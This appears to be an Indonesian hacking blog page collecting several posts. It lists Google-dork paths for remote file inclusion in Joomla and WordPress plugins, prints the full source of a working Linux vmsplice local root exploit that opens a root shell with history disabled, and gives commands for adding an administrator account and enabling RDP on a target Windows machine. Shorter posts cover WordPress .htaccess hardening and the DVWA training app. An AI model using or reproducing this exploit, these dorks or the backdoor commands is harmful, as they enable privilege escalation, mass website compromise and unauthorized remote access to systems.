Get Chitika | Premium
Custom Search

bug dork joomla

/components/com_flyspray/startdown.php?file=
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_securityimages/lang.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/akocomments.php?mosConfig_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/cropcanvas.php?cropimagedir=
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_fm/fm.install.php?lm_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/components/com_lmo/lmo.php?mosConfig_absolute_path=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=
/administrator/components/com_webring/admin.webring.docs.php?component_dir=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
/components/com_mambowiki/Mam***ogin.php?IP=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/components/com_mospray/scripts/admin.php?basedir=
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
/components/com_madeira/img.php?url=
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
/com_bsq_sitestats/external/rssfeed.php?baseDir=
/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/components/com_joomlaboard/file_upload.php?sbp=
/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
/modules/mod_weather.php?absolute_path=
/components/calendar/com_calendar.php?absolute_path=
/modules/calendar/mod_calendar.php?absolute_path=
/components/com_calendar.php?absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=
»»  READMORE...
Read more »
1 komentar

bug dork wordpress

index/wp-content/plugins/Enigma2.php?boarddir=
mygallery/myfunctions/mygallerybrowser.php?myPath=
plugins/wp-table/js/wptable-button.phpp?wpPATH=
plugins/wordtube/wordtube-button.php?wpPATH=
plugins/myflash/myflash-button.php?wpPATH=
plugins/BackUp/Archive.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=
plugins/sniplets/modules/syntax_highlight.php?libpath=
»»  READMORE...
Read more »
0 komentar

Kernel 2.6.17 

/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define __KERNEL__
#include 

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint  unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS  0x73
#define USER_SS  0x7b
#define USER_FL  0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
    "i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS  0x23
#define USER_SS  0x2b
#define USER_FL  0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
    "i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
 if (p[0] == uid && p[1] == uid &&
     p[2] == uid && p[3] == uid &&
     p[4] == gid && p[5] == gid &&
     p[6] == gid && p[7] == gid) {
  p[0] = p[1] = p[2] = p[3] = 0;
  p[4] = p[5] = p[6] = p[7] = 0;
  p = (uint *) ((char *)(p + 8) + sizeof(void *));
  p[0] = p[1] = p[2] = ~0;
  break;
 }
 p++;
}

exit_kernel();
}

void exit_code()
{
if (getuid() != 0)
 die("wtf", 0);

printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
int  pi[2];
size_t  map_size;
char *  map_addr;
struct iovec iov;
struct page * pages[5];

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");

if (!uid || !gid)
 die("!@#$", 0);

/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
 die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags    = 1 << PG_compound;
pages[0]->private  = (unsigned long) pages[0];
pages[0]->count    = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
 die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags    = 1 << PG_compound;
pages[2]->private  = (unsigned long) pages[2];
pages[2]->count    = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
 die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
 die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
 die("munmap", errno);

/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);

iov.iov_base = map_addr;
iov.iov_len  = ULONG_MAX;

signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}
download here
»»  READMORE...
Read more »
0 komentar

Protect WordPress Directory with .Htaccess

Let us discuss about. Htaccess file, what it is. Htacess ..? . htaccess file is an ASCII text file that is located in the root directory is usually "public_html" or klo hosting free in the "htdocs" which is often used to change the default settings from the web server is running. So that the benefits of. Htaccess file is huge. And a Web Utility is often used by the web master.
then what should be in secure in wordpress.? how many, example / wp-admin, / wp-includes, wp-login.php, wp-db.php, wp-config.php. / etc ..
immediately wrote gan, source code I'll give you a live copy and paste on. htaccess, already know the times ..

Access page / Wp-Admin Login with Private IP / Single IP

AuthUserFile / dev / null
AuthGroupFile / dev / null
AuthName "Access Control"
AuthType Basic
Order deny, allow
deny from all
# IP address mate
allow from **.***.***.**

Take a look at the red letters, the same fox **.***.***.** your IP, so IP aja special one who can access the page ..
Keep what about the wp-login.php was also the same right for login ..? Well calm down, we go to wp-login.php, using private IP as well ..

Order deny, allow
Deny from All
Allow from **.***.***.**
same as above, replace the red writing that use the IP you, if you make a dynamic IP address does not need mending, coz it's just for one IP only,

Secure your wp-config.php

Advanced brother, now we mw amanin wp-config.php file, dh wp-config.php know that their role, and therefore let us secure ..
This code ..

# Protect wpconfig.php
order allow, deny
deny from all

Following that we discuss goto the directory Wp-includes, if said people still in the directory wp-includes wp-db.php exists that can ngebongkar all our important data,
made in case of attack wp-includes the authority to make gk index.php or index.html file in that directory gan. For wp-db.php try agan access, there must be an error in wp-includes/wp-db.php that right, there emang klo kelemahanya let us cover it, how to create. Htaccess file the directory section wp-includes, continue to fill the same this code ..

RewriteEngine On
RewriteBase /
RewriteRule .* \. Php $ readme.html [L]
Look at the red writing that, it's readme file of wordpress, we try to transfer the file wp-db.php to the file readme.html in this way.

Ok done, hopefully useful and handy.
»»  READMORE...
Read more »
0 komentar

Comand RDP conection.

Comand RDP conection.
Hostname see the name / host computer
Ipconfig to see the computer ip
Net view to see the hostnames in a single network terShare
Net users to view a list of users in computer
net user (username) (password) / add to add the user into the list
Net localgroup administrators (username) / add to add users to the group administrator. to have full control of computer access rights.

if RDP is not enabled. You can activate it using the following comand:

@ reg add "\ \ contents hostname \ HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f

ket: REG_DWORD / d 0 / f
0 = RDP on
1 = RDP-off



so in essence we adduser on these windows.
1. net user USER PASS / add (ex. jatimcom jcomers net user / add)
2. net localgroup administrators USER / add (net localgroup jatimcom administrators / add)

done just that, check if open rdp port login directly if you have not opened using the open command in the post above. if port ping timeout just throw it I suggest the target, the chances are usually very small.

I hope many of the useful.
»»  READMORE...
Read more »
0 komentar

Damn Vulnerable Web Application (DVWA)

Damn Vulnerable Web Application (DVWA) is a collection of web hacking tool based on PHP / mySQL. DVWA may be an option for beginners to learn web hacking web hacking techniques from scratch. Various techniques web hacking attacks can be obtained from this tool. Besides easy to use, lightweight and complete, DVWA run through a local server (localhost) using WAMP / XAMP / LAMP and others.

 DVWA include some web hacking tools such as:

- SQL Injection
- XSS (Cross Site Scripting)
- LFI (Local File Inclusion)
- RFI (Remote File Inclusion)
- Command Execution
- Upload Script
- Login Brute Force

Download here
»»  READMORE...
Read more »
0 komentar
Subscribe to: Posts (Atom)